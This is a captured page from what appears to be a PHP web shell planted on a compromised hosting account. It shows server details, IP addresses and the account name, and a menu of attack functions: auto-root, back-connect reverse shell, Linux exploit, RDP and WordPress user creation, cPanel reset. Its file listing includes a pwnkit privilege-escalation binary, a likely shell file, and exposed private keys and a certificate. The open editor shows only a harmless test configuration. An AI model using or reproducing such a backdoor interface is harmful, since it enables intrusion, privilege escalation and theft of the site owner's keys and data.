Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
delivery
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env.example
651
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
155
B
-rw-r--r--
.htaccess
281
B
-rw-r--r--
.htaccess-old
281
B
-rw-r--r--
.htaccess.1
339
B
-rw-r--r--
.htaccess.2
709
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.trash_restore
2.26
KB
-rw-------
adminer.php
465.43
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
certificado.pfx
9.26
KB
-rw-r--r--
check.txt
0
B
-rw-r--r--
composer.json
1.62
KB
-rw-r--r--
composer.lock
148.19
KB
-rw-r--r--
index.html
274
B
-rw-r--r--
mueblinnova_2024.zip
33.79
MB
-rw-r--r--
package.json
1022
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
private_key.pem
1.66
KB
-rw-r--r--
public_key.pem
1.73
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.md
3.59
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
webpack.mix.js
549
B
-rw-r--r--
yarwfksb.php
760
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml
<?xml version="1.0" encoding="UTF-8"?> <phpunit backupGlobals="false" backupStaticAttributes="false" bootstrap="vendor/autoload.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false"> <testsuites> <testsuite name="Feature"> <directory suffix="Test.php">./tests/Feature</directory> </testsuite> <testsuite name="Unit"> <directory suffix="Test.php">./tests/Unit</directory> </testsuite> </testsuites> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">./app</directory> </whitelist> </filter> <php> <env name="APP_ENV" value="testing"/> <env name="BCRYPT_ROUNDS" value="4"/> <env name="CACHE_DRIVER" value="array"/> <env name="SESSION_DRIVER" value="array"/> <env name="QUEUE_DRIVER" value="sync"/> <env name="MAIL_DRIVER" value="array"/> </php> </phpunit>
Close